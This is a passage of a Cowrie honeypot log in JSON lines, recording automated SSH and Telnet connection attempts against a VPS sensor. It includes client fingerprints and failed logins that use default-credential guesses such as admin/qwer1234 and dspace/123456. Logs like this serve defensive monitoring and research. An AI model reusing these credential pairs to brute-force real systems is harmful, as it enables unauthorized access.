sh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:49:39.152750Z","src_ip":"82.67.125.95","session":"da7e5625e00b"}
{"eventid":"cowrie.login.failed","username":"julie","password":"julie123","message":"login attempt [julie/julie123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:49:39.338472Z","src_ip":"82.67.125.95","session":"da7e5625e00b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:49:40.376571Z","src_ip":"82.67.125.95","session":"da7e5625e00b"}
{"eventid":"cowrie.session.closed","duration":13.676213026046753,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:49:44.685392Z","src_ip":"212.227.235.229","session":"829c0050fd0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55026,"dst_ip":"1.2.3.4","dst_port":22,"session":"5697202722fb","protocol":"ssh","message":"New connection: 212.227.235.229:55026 (1.2.3.4:22) [session: 5697202722fb]","sensor":"my-vps","timestamp":"2025-08-31T01:50:13.461353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:50:14.130164Z","src_ip":"212.227.235.229","session":"5697202722fb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:50:14.131579Z","src_ip":"212.227.235.229","session":"5697202722fb"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"123456","message":"login attempt [dspace/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:50:20.189778Z","src_ip":"212.227.235.229","session":"5697202722fb"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:50:21.968211Z","src_ip":"212.227.235.229","session":"5697202722fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46320,"dst_ip":"1.2.3.4","dst_port":22,"session":"495e76625e14","protocol":"ssh","message":"New connection: 212.227.125.160:46320 (1.2.3.4:22) [session: 495e76625e14]","sensor":"my-vps","timestamp":"2025-08-31T01:50:35.100655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:50:35.683246Z","src_ip":"212.227.125.160","session":"495e76625e14"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:50:35.711792Z","src_ip":"212.227.125.160","session":"495e76625e14"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":58830,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a111d08d9c0","protocol":"ssh","message":"New connection: 82.67.125.95:58830 (1.2.3.4:22) [session: 1a111d08d9c0]","sensor":"my-vps","timestamp":"2025-08-31T01:50:35.777496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:50:35.778452Z","src_ip":"82.67.125.95","session":"1a111d08d9c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:50:35.814307Z","src_ip":"82.67.125.95","session":"1a111d08d9c0"}
{"eventid":"cowrie.login.failed","username":"viper","password":"viper","message":"login attempt [viper/viper] failed","sensor":"my-vps","timestamp":"2025-08-31T01:50:35.999084Z","src_ip":"82.67.125.95","session":"1a111d08d9c0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:50:37.037572Z","src_ip":"82.67.125.95","session":"1a111d08d9c0"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"123456","message":"login attempt [dspace/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:50:37.878874Z","src_ip":"212.227.125.160","session":"495e76625e14"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:50:39.371421Z","src_ip":"212.227.125.160","session":"495e76625e14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38276,"dst_ip":"1.2.3.4","dst_port":22,"session":"63e40a4739f5","protocol":"ssh","message":"New connection: 212.227.235.229:38276 (1.2.3.4:22) [session: 63e40a4739f5]","sensor":"my-vps","timestamp":"2025-08-31T01:51:14.277385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:51:15.049805Z","src_ip":"212.227.235.229","session":"63e40a4739f5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:51:15.050605Z","src_ip":"212.227.235.229","session":"63e40a4739f5"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"12345","message":"login attempt [dspace/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T01:51:21.066730Z","src_ip":"212.227.235.229","session":"63e40a4739f5"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:51:22.850294Z","src_ip":"212.227.235.229","session":"63e40a4739f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36416,"dst_ip":"1.2.3.4","dst_port":22,"session":"efd53ee5a116","protocol":"ssh","message":"New connection: 212.227.235.229:36416 (1.2.3.4:22) [session: efd53ee5a116]","sensor":"my-vps","timestamp":"2025-08-31T01:51:30.159001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:51:30.159919Z","src_ip":"212.227.235.229","session":"efd53ee5a116"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T01:51:30.257205Z","src_ip":"212.227.235.229","session":"efd53ee5a116"}
{"eventid":"cowrie.login.failed","username":"asterisk","password":"asterisk","message":"login attempt [asterisk/asterisk] failed","sensor":"my-vps","timestamp":"2025-08-31T01:51:30.550271Z","src_ip":"212.227.235.229","session":"efd53ee5a116"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:51:31.648858Z","src_ip":"212.227.235.229","session":"efd53ee5a116"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":53524,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e0c6292f56c","protocol":"ssh","message":"New connection: 82.67.125.95:53524 (1.2.3.4:22) [session: 7e0c6292f56c]","sensor":"my-vps","timestamp":"2025-08-31T01:51:33.945318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:51:33.946327Z","src_ip":"82.67.125.95","session":"7e0c6292f56c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:51:33.981955Z","src_ip":"82.67.125.95","session":"7e0c6292f56c"}
{"eventid":"cowrie.login.failed","username":"karthavya","password":"karthavya","message":"login attempt [karthavya/karthavya] failed","sensor":"my-vps","timestamp":"2025-08-31T01:51:34.168362Z","src_ip":"82.67.125.95","session":"7e0c6292f56c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:51:35.206083Z","src_ip":"82.67.125.95","session":"7e0c6292f56c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57112,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e5c24fbfa11","protocol":"ssh","message":"New connection: 212.227.125.160:57112 (1.2.3.4:22) [session: 3e5c24fbfa11]","sensor":"my-vps","timestamp":"2025-08-31T01:51:36.217044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:51:36.603545Z","src_ip":"212.227.125.160","session":"3e5c24fbfa11"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:51:36.656388Z","src_ip":"212.227.125.160","session":"3e5c24fbfa11"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"12345","message":"login attempt [dspace/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T01:51:39.114878Z","src_ip":"212.227.125.160","session":"3e5c24fbfa11"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:51:40.646122Z","src_ip":"212.227.125.160","session":"3e5c24fbfa11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48340,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a153444c17a","protocol":"ssh","message":"New connection: 212.227.235.229:48340 (1.2.3.4:22) [session: 9a153444c17a]","sensor":"my-vps","timestamp":"2025-08-31T01:52:14.642360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:52:15.418489Z","src_ip":"212.227.235.229","session":"9a153444c17a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:52:15.419214Z","src_ip":"212.227.235.229","session":"9a153444c17a"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"1234567","message":"login attempt [dspace/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T01:52:21.539797Z","src_ip":"212.227.235.229","session":"9a153444c17a"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:52:23.519069Z","src_ip":"212.227.235.229","session":"9a153444c17a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44244,"dst_ip":"1.2.3.4","dst_port":23,"session":"d9741ecc498a","protocol":"telnet","message":"New connection: 212.227.125.160:44244 (1.2.3.4:23) [session: d9741ecc498a]","sensor":"my-vps","timestamp":"2025-08-31T01:52:26.322147Z"}
{"eventid":"cowrie.session.closed","duration":"301.1","message":"Connection lost after 301.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:52:27.196184Z","src_ip":"115.190.94.119","session":"1f9b8d92d0ce"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":39724,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef3a5234090e","protocol":"ssh","message":"New connection: 82.67.125.95:39724 (1.2.3.4:22) [session: ef3a5234090e]","sensor":"my-vps","timestamp":"2025-08-31T01:52:32.950629Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:52:32.951531Z","src_ip":"82.67.125.95","session":"ef3a5234090e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:52:32.987296Z","src_ip":"82.67.125.95","session":"ef3a5234090e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qwer1234","message":"login attempt [admin/qwer1234] failed","sensor":"my-vps","timestamp":"2025-08-31T01:52:33.175110Z","src_ip":"82.67.125.95","session":"ef3a5234090e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:52:34.213737Z","src_ip":"82.67.125.95","session":"ef3a5234090e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39364,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab900e57dbb7","protocol":"ssh","message":"New connection: 212.227.125.160:39364 (1.2.3.4:22) [session: ab900e57dbb7]","sensor":"my-vps","timestamp":"2025-08-31T01:52:36.775182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:52:37.209989Z","src_ip":"212.227.125.160","session":"ab900e57dbb7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa